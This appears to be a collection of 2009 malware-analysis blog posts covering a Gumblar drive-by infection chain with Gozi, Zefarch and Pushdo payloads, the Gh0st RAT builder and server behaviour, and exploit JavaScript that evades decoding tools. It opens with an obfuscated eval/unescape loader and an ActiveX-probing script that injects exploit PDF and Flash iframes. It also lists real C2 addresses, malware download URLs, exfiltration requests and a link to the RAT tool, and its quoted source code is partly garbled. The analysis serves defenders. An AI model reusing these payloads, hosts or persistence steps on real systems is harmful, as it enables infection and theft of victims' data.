6%2%3%6%4%3%6%1%3%5%3%6%7%3%a%n%k%s%F%0%f%f%2%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%d%c%g%I%d%c%g%g%k%E%0%1%j%N%B%U%T%S%Q%l%0%4%t%0%f%1f%4%1%p%5%1%14%e%1%1d%5%5%8%2%5%2%o%b%h%4%7%5%1k%5%b%e%f%r%9%8%j%m%i%o%8%1%n%6%7%3%a%3%6%e%3%6%2%3%6%4%3%b%3%6%1%3%5%n%k%s%F%0%f%f%2%2%0%9%8%h%J%9%l%u%d%c%g%K%d%c%d%c%g%j%N%B%U%T%S%Q%l%r%X%l%i%j%v%q%p%h%R%i%h%q%0%t%0%J%9%m%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%j%N%B%U%T%S%Q%l%r%B%p%O%j%9%8%v%v%8%C%R%i%h%q%0%t%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%4%2%e%9%4%e%5%p%4%a%1%5%s%a%1%9%7%a%i%4%e%O%2%2%0%2%4%5%10%4%k%e%1%m%2%1%8%b%b%a%v%2%1%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%2%3%a%3%6%e%3%6%1%3%6%7%3%5%3%6%4%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%2%b%J%4%h%5%5%7%m%4%e%p%2%b%p%4%Y%5%e%2%0%5%1c%a%V%b%j%1%4%7%9%7%8%5%5%v%7%b%v%e%4%a%f%r%9%8%j%m%i%o%8%1%n%6%4%3%b%3%5%3%6%e%3%6%2%3%a%3%6%1%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%L%e%7%i%2%1%14%4%7%r%4%5%8%7%a%e%1%V%b%a%8%2%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%5%3%b%3%6%4%3%a%3%6%1%3%6%2%n%k%s%F%0%f%f%2%u%d%c%g%g%j%N%B%U%T%S%Q%l%r%R%9%k%l%h%X%l%i%j%v%q%p%h%1%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%I%K%u%d%c%d%c%g%z%i%9%0%8%Y%Q%R%z%k%m%13%18%1e%0%t%0%v%8%h%19%l%h%8%9%z%i%m%1%E%J%l%o%h%k%p%l%1%2%I%k%E%0%1%j%N%B%U%T%S%Q%l%r%9%8%i%C%M%X%h%i%h%8%0%t%t%0%w%2%0%I%o%m%8%i%9%19%l%h%8%9%z%i%m%1%8%Y%Q%R%z%k%m%13%18%1e%2%u%L%k%l%C%p%L%r%m%p%o%i%h%k%p%l%0%t%0%f%m%1%C%b%i%1%1%1%1%j%1%W%b%4%2%n%a%7%1%a%a%n%2%7%a%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%6%1%3%6%2%3%a%3%b%3%5%3%6%4%n%k%s%F%0%f%f%2%u%K%K%F%0%1j%16%16%16%2%u%d%c%K%d%c%d%c%m%9%o%1a%O%M%N%1b%k%1%f%q%b%2%h%2%5%a%5%h%b%j%4%W%e%7%e%n%2%e%2%n%1%e%m%a%7%k%1%h%4%b%8%7%q%1%k%2%2%h%2%5%v%5%1%o%2%5%4%b%4%i%5%9%7%1%7%r%b%o%1%7%1%l%e%1%n%4%4%m%b%e%p%7%b%7%i%b%7%4%4%e%C%b%r%7%7%j%4%5%4%q%1%b%j%2%a%b%5%2%1n%5%2%1%5%k%e%e%7%C%2%b%a%t%5%17%4%1%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%1%3%a%3%b%3%6%2%3%6%4%3%5%3%6%e%n%k%s%F%0%f%f%2%2%u\'));',62,86,'u0020|u0028|u0029|u007c|u0021|u0026|u005c|u005e|u0065|u0072|u0040|u0023|u000a|u000d|u0024|u0027|u0009|u0074|u0061|u0070|u0069|u006e|u006c|u002f|u0063|u006f|u0068|u002e|u0067|u003d|u003b|u0073|u0034|u0022|u002b|u0076|u0035|u0043|u0064|u004f|u0066|u002c|u0052|u0051|u007b|u0075|u007d|u0077|u0079|u004a|u006d|u0048|u004e|u0050|u004c|u0042|u0059|u0078|u003a|u0053|u006b|u0058|u0046|u004b|u0057|u0036|u0062|u0032|u0030|u0031|u0041|u0049|u0037|u0044|u0045|u006a|u0055|u005b|u003c|eval|unescape|u0033|u005d|u0056|u0039|u003f'.split('|')))</script><html>

<body>
<script>
function pdfswf()
{
.PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
.for(i in PDF)
.{
..try
..{
...obj = new ActiveXObject(PDF[i]);
...if (obj)
...{
....document.write('<iframe src="cache/readme.pdf"></iframe>');
...}
..}
..catch(e){}
.}
.try
.{
..obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
..if (obj)
..{
...document.write('<iframe src="cache/flash.swf"></iframe>');
..}
.}
.catch(e){}
}
pdfswf();
</script>



Malware Analysis

http://litehitscar.cn/load.php?id=5 (load.exe)

The request for load.php returns the binary file load.exe.

File: load.exe
Size: 18432
MD5: 4C328C15F6E8603F713FDACF7DAC6E87

The malware dropper load.exe creates C:\WINDOWS\system32\digiwet.dll and modifies a registry key to launch the malware at startup.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders "SecurityProviders"
Old type: REG_SZ
New type: REG_SZ
Old data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
New data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

The digiwet.dll malware is the core “Gumblar” bot. The malware initiates connections to the bot controller at 78.109.29.112 (Ukraine) and downloads 259043 bytes of data which includes additional malware. Additional C2 connections to 78.109.30.224 (Ukraine) were observed.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633 HTTP/1.1
Host: 78.109.29.112

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Apr 2009 00:06:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Version: 1
Content-Length: 259043
Entity-Info: 1239013921:32768:1;1239013932:41984:1;1239013964:84480:2;1239022982:33792:2;1239024633:45568:2;1239875139:20451:2;

Rnd: 982306

Magic-Number: 256|1|40:21:222:188:141:149:35:113:122:238:96:131:88:202:90:82:137:127:146:127:209:5:235:94:57:25:53:42:127:239:54:168:4:21:100:145:170:136:3:37:118:100:168:206:47:2:33:184:129:179:55:83:185:35:177:242:60:231:29:188:214:84:100:218:105:201:108:19:81:112:57:199:212:225:150:3:228:183:188:102:107:243:186:36:23:108:23:83:83:52:16:41:136:116:4:241:62:112:5:143:225:62:87:182:32:238:186:5:166:118:107:17:106:38:54:129:146:77:213:229:129:229:14:10:90:19:251:152:132:1:40:101:64:128:27:97:111:213:102:21:75:210:39:181:248:93:55:138:170:12:112:44:242:127:54:77:146:50:229:22:51:14:123:115:143:151:213:254:108:59:20:184:14:59:110:6:152:165:145:67:178:1:111:164:128:165:241:19:215:215:41:11:230:164:126:117:60:84:116:168:143:136:97:157:195:207:164:92:117:54:159:39:55:14:204:184:180:189:203:139:149:245:150:124:154:21:241:214:105:102:127:249:238:224:151:178:176:59:14:37:113:173:77:169:187:25:98:112:215:46:251:108:35:146:233:189:

eON...#q~.`..5ZR1......^y.5*..6...d....%vd../.!...7S.#..

************************************************************************

GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start HTTP/1.1
Host: 78.109.29.112


************************************************************************

POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

guid=397089404

************************************************************************

The downloaded data creates 4 temp files:

C:\WINDOWS\Temp\wpv451239013964.exe
C:\WINDOWS\Temp\wpv211239022982.exe
C:\WINDOWS\Temp\wpv781239024633.exe
C:\WINDOWS\Temp\wpv941239875139.exe

wpv451239013964.exe (Downloader)
The Temp file wpv451239013964.exe creates a trojan downloader. The malware creates:

C:\WINDOWS\system32\crypts.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Asynchronous"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "DLLName"
Type: REG_SZ
Data: crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Impersonate"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "StartShell"
Type: REG_SZ
Data: Run

The malware connects to af9f440dcc.com (83.133.127.5, Germany) to receive instructions for additional malware downloads. The below connection returns instructions to download malware from spaeioer.com (68.180.151.74, US)

GET /bt.php?mod=&id=computername_-324073247&up=2667859&mid=soboc43 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: af9f440dcc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Fri, 17 Apr 2009 00:42:08 GMT
Server: lighttpd/1.4.19


0SLP:3600;MOD:dAjvlbv5;URL:http://spaeioer.com/741l3.exe;SRV:stoped;

************************************************************************

GET /741l3.exe HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: spaeioer.com
Connection: Keep-Alive


************************************************************************

wpv211239022982.exe (Gozi)
The Temp file wpv211239022982.exe creates a Gozi variant. The malware monitors web connections and serves as an infostealer. The Temp file wpv211239022982.exe creates:

C:\WINDOWS\9129837.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = "%Windir%\9129837.exe"

The file 9129837.exe creates:

C:\WINDOWS\new_drv.sys

HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 15, AB, 0A, 85
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: 91, CC, B1, 44
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 16


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [binary data]

The following services are stopped:

Application Layer Gateway Service
Windows Firewall/Internet Connection Sharing (ICS)
Security Center

The Gozi malware connects to 91.207.61.44 (Ukraine) and 212.117.165.54 (Luxembourg) for C2 and data exfiltration.

POST /cgi-bin/ppp.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28c6e728c6e728c6e7
User-Agent: IE
Host: 91.207.61.44
Content-Length: 231
Cache-Control: no-cache


----------------------------28c6e728c6e728c6e7

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
Forms:

----------------------------28c6e728c6e728c6e7--


************************************************************************

GET /cgi-bin/commm.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44


************************************************************************

GET /cgi-bin/ooo.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44


************************************************************************

POST /cgi-bin/ccc.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28cd6f28cd6f28cd6f
User-Agent: IE
Host: 91.207.61.44
Content-Length: 305
Cache-Control: no-cache

----------------------------28cd6f28cd6f28cd6f

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream


0S...0...*.H.. .......0.0;0.0...+........z(W...g*{....5&.............*...Z...18m.....

----------------------------28cd6f28cd6f28cd6f—


************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28ea2e28ea2e28ea2e
User-Agent: IE
Host: 91.207.61.44
Content-Length: 263
Cache-Control: no-cache


----------------------------28ea2e28ea2e28ea2e
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

load=1
----------------------------28ea2e28ea2e28ea2e--

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------297799297799297799
User-Agent: IE
Host: 91.207.61.44
Content-Length: 3494
Cache-Control: no-cache


----------------------------297799297799297799

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"

Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

type=jpg&img=/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAwANoDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2a3ea22a3ea22a3ea2
User-Agent: IE
Host: 91.207.61.44
Content-Length: 266
Cache-Control: no-cache

----------------------------2a3ea22a3ea22a3ea2

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream


URL: https://212.117.165.54/put.php

confirm=1

----------------------------2a3ea22a3ea22a3ea2—

************************************************************************

wpv781239024633.exe (Zefarch)
The Temp file wpv781239024633.exe creates a Trojan. Zefarch variant. The malware monitors connections to various search engines and redirects search results to adware and malicious websites. The Temp file wpv781239024633.exe creates:

C:\WINDOWS\psbdxt.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Wjite"
Type: REG_BINARY
Data: 43, 01, 38, 03, 58, 05, 51, 07, 41, 09, 44, 0B, 48, 0D, 41, 0F, 47, 11, 41, 13, 48, 15, 66, 17, 6B, 19, 78, 1B, 78, 1D, 66, 1F, 54, 21, 0C, 23, 40, 25, 4A, 27, 44, 29, 2A, 2B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Xlaheko"
Type: REG_SZ
Data: 61

wpv941239875139.exe (Pushdo)
The Temp file wpv941239875139.exe creates a Pushdo/Pandex/Cutwail variant. The malware serves as a spambot. The Temp file wpv941239875139.exe creates a file in the user profile directory with the same name as the actual profile name. In this example john.exe was created.

Creates:
C:\Documents and Settings\John\John.exe

A registry key is created to launch the malware at startup

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i

The malware connected to 94.247.2.95 (Latvia) for C2.

GET /40E8001430303030303030303030303030303030303031306C0000009666000000007600000642EB00053059707A82 HTTP/1.0
Content-Type: application/octet-stream


Filename Size MD5
741l3.exe 72704 03aaccd01330f844d6c601df997fc1ff
9129837.exe 33792 096ffe693647f1ad8b2e86a8b7f05b44
crypts.dll 33280 1e6d7d0dcb2afcbf20b676f0992057bb
digiwet.dll 18432 3a1d598473469887fd0ed651b7ca96b8
flash.swf 16588 609d207cf010cbda0fcde027301cbd0e
John.exe 20451 eda1b7d3cdb3fb1a1c4e4ba2b51b46a7
load.exe 18432 4c328c15f6e8603f713fdacf7dac6e87
new_drv.sys 8192 a54de1d46ff7bdefbf9d9284c1916c5e
psbdxt.dll 45568 e075c7258f38b6581277552db80659f3
readme.pdf 15964 3e8da97b9f4da49498dfa31ae1c5c342
wpv451239013964.exe 84480 29d9286c42074702a96d94138a092450
wpv781239024633.exe 45568 27a9a6570b53d3dc1e9a24317f6f6fa6

Saturday, April 11, 2009

Gh0st Rat

On April 11, 2009, researchers at the Information Warfare Monitor released a report that uncovered a suspected cyber espionage network of over 1,295 infected hosts in 103 countries. The report "Tracking GhostNet: Investigating a Cyber Espionage Network" is summarized as:

"This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.

The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured.

The report concludes that who is in control of GhostNet is less important than the opportunity for generating strategic intelligence that it represents. The report underscores the growing capabilities of computer network exploitation, the ease by which cyberspace can be used as a vector for new do-it-yourself form of signals intelligence. It ends with warning to policy makers that information security requires serious attention."

Gh0st RAT
GhostNet is a dubbed name for the C2 network of hosts infected with Gh0st RAT. The latest version of Gh0st RAT is Gh0st RAT Beta 3.6.

Gh0st RAT Beta 3.6 (English) Usage

Server Creation
The file gh0st_eng.exe is used to create the Gh0st RAT server dropper and serves as the C2 management console.

File: gh0st_eng.exe
Size: 712704
MD5: 88912D9FE630BEE510BD7E85D0F9331D



The setting tab provides the C2 listening port, proxy configurations, user and password, IP and port for the Gh0st RAT to connect to, and a string created by an algorithm based on the DNS/IP and port.



The Gh0st RAT Beta 3.6 source decode.h file contains the algorithm for the Key Strings creation.

static char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

static int pos(char c)
{
char *p;
for(p = base64; *p; p++)
if(*p == c)
return p - base64;
return -1;
}

int base64_decode(const char *str, char **data)
{
const char *s, *p;
unsigned char *q;
int c;
int x;
int done = 0;
int len;
s = (const char *)malloc(strlen(str));
q = (unsigned char *)s;
for(p=str; *p && !done; p+=4){
x = pos(p[0]);
if(x >= 0)
c = x;
else{
done = 3;
break;
}
c*=64;

x = pos(p[1]);
if(x >= 0)
c += x;
else
return -1;
c*=64;

if(p[2] == '=')
done++;
else{
x = pos(p[2]);
if(x >= 0)
c += x;
else
return -1;
}
c*=64;

if(p[3] == '=')
done++;
else{
if(done)
return -1;
x = pos(p[3]);
if(x >= 0)
c += x;
else
return -1;
}
if(done <>>16;

if(done <>>8;
if(done <>>0;
}

len = q - (unsigned char*)(s);

*data = (char*)realloc((void *)s, len);

return len;
}

char* MyDecode(char *str)
{
int i, len;
char *data = NULL;
len = base64_decode(str, &data);

for (i = 0; i <>

The build tab provides a C2 HTTP initial destination, and registry key parameters. The tool gives credit to C.Rufus Security Team and CoolDiyer. The source code ReadMe file included the following credits and links to the tool and demo.

Gh0st RAT
C.Rufus Security Team
http://www.wolfexp.net

http://www.wolfexp.net/other/Gh0st_RAT/index.html
http://www.wolfexp.net/other/Gh0st_RAT/demo.rar

In this example, the Gh0st RAT server was created as:

File: server.exe
Size: 112247
MD5: 7602AA86A58D68CCFD2E380BD6DA5158



Server Execution
The server component is intended to be executed on a victim system. The execution of server.exe results in the download of ip.jpg which contains the string that causes the redirect to the real C2 site.

GET /ip.jpg HTTP/1.0
User-Agent: Mozilla/4.0 (compatible)
Host: www.badsite.org

Pragma: no-cache


HTTP/1.1 200 OK

Date: Sat, 11 Apr 2009 18:13:58 GMT

Server: Apache

Last-Modified: Sat, 11 Apr 2009 18:06:35 GMT

ETag: "1bdecfd-20-49e0dc2b"

Accept-Ranges: bytes

Content-Length: 32

Connection: close

Content-Type: image/jpeg


AAAArqaxva61p72vva6xqaevnw==AAAA



Server.exe creates the dll file 6to4svc.dll in the system32 directory.

File: 6to4svc.dll
Size: 100352
MD5: 97D0CECEF133BBE59ABF3CB6D05226C3

The following registry keys register 6to4svc.dll as the service 6to4 with the display name Microsoft Device Manager.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Description"
Type: REG_SZ
Data: Service Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "DisplayName"
Type: REG_SZ
Data: Microsoft Device Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ImagePath"
Type: REG_EXPAND_SZ
Data: %SystemRoot%\System32\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Type"
Type: REG_DWORD
Data: 20, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_6TO4\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Parameters "ServiceDll"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\6to4ex.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Security "Security"
Type: REG_BINARY
Data:[hex]


The Gh0st RAT server 6to4svc.dll connects to the C2 host destination.



Server Gh0st RAT Management
The Gh0st RAT C2 management console provides several options for manipulating a victim host. The C2 functionality can be observed at http://www.youtube.com/watch?v=qP-9qmSCe7o

Tuesday, January 20, 2009

Evading JavaScript Decoders?

I was recently provided exploit code that appears to be designed to evade analysts using decoding tools such as Malzilla. Obfuscation techniques continually evolve, but it is interesting when malcoders utilize techniques to deliberately mess with analysts.

In the past, I've seen exploit code writers throw in a closing </textarea> tag nullifying the technique of using textarea tags to manipulate document.write script. An older method of decoding JavaScript was to change script like document.write(r) to document.write("<textarea>"+r+"</textarea>"). The output would be placed in an html textarea object. The following decoded sample reveals a closing textarea tag which renders the decoding technique useless.

</textarea><html>
<head>
<title></title>
<script language="JavaScript">

var memory = new Array();
var mem_flag = 0;

function having() { memory=memory; setTimeout("having()", 2000); }

A recent example originated from various advertising content that redirected to srv(dot)ad-adnet(dot).net/code/smain.php?scout=jvcxeng. The sv.ad-adnet.net request returned obfuscated code.

<script language="javascript">

var enschr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var i;var enschrs=new Array();for(i=0;i<enschr.length;i++){enschrs[i]=enschr.charAt(i);}var rvenchr=new Array();for(i=0;i<enschrs.length;i++){rvenchr[enschrs[i]]=i;}var ensstr, enscnt;function sensstr(str){ensstr=str;enscnt=0;}function rrvren(){if(!ensstr) return -1;while(true){if(enscnt >= ensstr.length) return -1;var [truncated]...

In this example, Malzilla is used to decode the eval function.



The eval() function is replaced in Malzilla with the decoded result and decoded again. It looks like the second decoded result is “---“.



The “---“ appears to be used to make analysts think they received a result or lack of a result. The decoded content contains a bunch of whitespace that requires the analyst to scroll down to see the exploit code. The only explanation is the bad guys are attempting to to throw analysts off.



It's isn't an elaborate effort, but it is interesting to know the bad guys know that analysts are looking at and decoding their exploit code and are trying to counteract analyst techniques with a wide variety of TTPs.